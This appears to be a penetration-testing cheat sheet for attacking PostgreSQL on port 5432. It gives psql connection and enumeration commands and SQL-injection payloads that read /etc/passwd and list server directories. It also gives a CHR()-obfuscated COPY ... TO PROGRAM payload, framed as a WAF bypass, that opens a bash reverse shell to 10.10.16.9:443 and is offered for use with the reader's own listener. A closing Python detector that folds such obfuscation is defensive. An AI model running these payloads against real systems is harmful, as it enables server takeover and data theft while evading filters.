PostgreSQL Port (5432)

PostgreSQL is a powerful, open-source object-relational database system. During security assessments, you may encounter PostgreSQL services running on the standard port 5432 or on alternative ports such as 5433.

How to Connect

Basic Local Connection

psql -U <myuser>

Opens the psql console with the specified user.

Remote Connection (Basic)

psql -h <host> -U <username> -d <database>

Connect to a remote PostgreSQL server specifying host, username, and database.

Remote Connection (Full Parameters)

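psql -h <host> -p <port> -U <username> -W <database>

Complete remote connection with all parameters, including a custom port. The -W option forces a password prompt and takes no argument; the password is typed at the prompt rather than passed on the command line.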

Enumeration

List All Databases

\l

This command displays all available databases on the PostgreSQL server.

Switch to a Database

\c <database_name>

Change the current working database context.

List Tables in Current Database

\dt

Shows all tables within the currently selected database.

Extract Data from Specific Table

SELECT * FROM <table_name>;

Retrieve all records from a specified table.

File System Operations

Read File

''; SELECT pg_read_file('/etc/passwd',0,1000);

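Reads the contents of a file from the server's filesystem. This example reads the first 1000 characters of /etc/passwd. pg_read_file is restricted to superusers by default; other roles need an explicit EXECUTE grant on the function.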

List Directory

''; SELECT pg_ls_dir('/var/www/');

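Lists the contents of a directory on the server's filesystem. Like pg_read_file, pg_ls_dir is restricted to superusers by default unless EXECUTE has been granted to another role.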

Advanced Exploitation

Reverse Shell WAF Bypass through SQL Injection

'';DO $reverse$
DECLARE
    s text;
BEGIN
    s := CHR(67)||CHR(79)||CHR(80)||CHR(89)||
         ' (SELECT '''') TO PROGRAM ' ||
         quote_literal('bash -c "bash -i >& /dev/tcp/10.10.16.9/443 0>&1"');
    EXECUTE s;
END $reverse$;

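This technique uses PostgreSQL's COPY ... TO PROGRAM command to run an operating-system command and establish a reverse shell connection. COPY ... TO PROGRAM is only available to superusers and members of the pg_execute_server_program role, and the command runs as the operating-system user that runs the PostgreSQL server. The payload:

  • Uses CHR() functions to obfuscate the "COPY" command
  • Executes a bash reverse shell connecting to IP 10.10.16.9 on port 443
  • Bypasses basic WAF filters through string concatenation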

Note: Remember to replace the IP address and port with your actual listener configuration.

Security Considerations
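
The CHR()-concatenated statement above contains no literal COPY keyword, which is why keyword filters miss it. The following Python code is an added example, not part of the original page: it folds CHR(n) calls and || joins in logged statements before matching the primitives shown on this page. It assumes statements are available as text (for instance from the server log with log_statement enabled); the rule names and sample lines are constructed for illustration.

```python
import re

# CHR(67) / chr ( 67 ): a call that yields a one-character string.
_CHR = re.compile(r"\bchr\s*\(\s*(\d{1,7})\s*\)", re.I)
# 'abc' || 'def': two adjacent literals joined by the concat operator.
_JOIN = re.compile(r"'((?:[^']|'')*)'\s*\|\|\s*'((?:[^']|'')*)'")

# Primitives used on this page; the rule names are this example's own.
RULES = {
    "copy_program": re.compile(r"\bcopy\b[^;]*\b(?:to|from)\s+program\b", re.I),
    "server_file_read": re.compile(r"\bpg_read(?:_binary)?_file\s*\(", re.I),
    "server_dir_list": re.compile(r"\bpg_ls_dir\s*\(", re.I),
}
# Constructed sample statements, not real logs. <command> is a placeholder.
SAMPLE_LOG = [
    "LOG:  statement: SELECT id, name FROM products WHERE id = 7",
    "LOG:  statement: SELECT 1 WHERE n = ''; SELECT pg_read_file('/etc/passwd',0,1000);",
    "LOG:  statement: SELECT 1 WHERE n = '';DO $x$ DECLARE s text; BEGIN "
    "s := CHR(67)||CHR(79)||CHR(80)||CHR(89)|| ' (SELECT '''') TO PROGRAM ' "
    "|| quote_literal('<command>'); EXECUTE s; END $x$;",
    "LOG:  statement: COPY audit TO PROGRAM 'gzip > /backup/audit.gz'",
]

def _chr_literal(m):
    n = int(m.group(1))
    if not 0 < n <= 0x10FFFF:          # not a valid code point: keep the call as written
        return m.group(0)
    return "'" + chr(n).replace("'", "''") + "'"

def fold(sql):
    """Resolve CHR(n) calls and literal||literal joins to the string they build."""
    out, prev = _CHR.sub(_chr_literal, sql), None
    while out != prev:                 # repeat until no adjacent literals remain
        prev = out
        out = _JOIN.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", out)
    return out

def inspect(sql):
    """Return {rule: hidden}; hidden=True means only the folded text matched."""
    folded, hits = fold(sql), {}
    for name, rx in RULES.items():
        raw = bool(rx.search(sql))
        if raw or rx.search(folded):
            hits[name] = not raw
    return hits

if __name__ == "__main__":
    for lineno, line in enumerate(SAMPLE_LOG, 1):
        print(lineno, inspect(line) or "clean")
```

A rule reported with True was only visible after folding, which is a stronger signal than a plain match such as the backup job in the last sample line. Other ways of building strings (concat(), format(), escape-string literals) are not folded here.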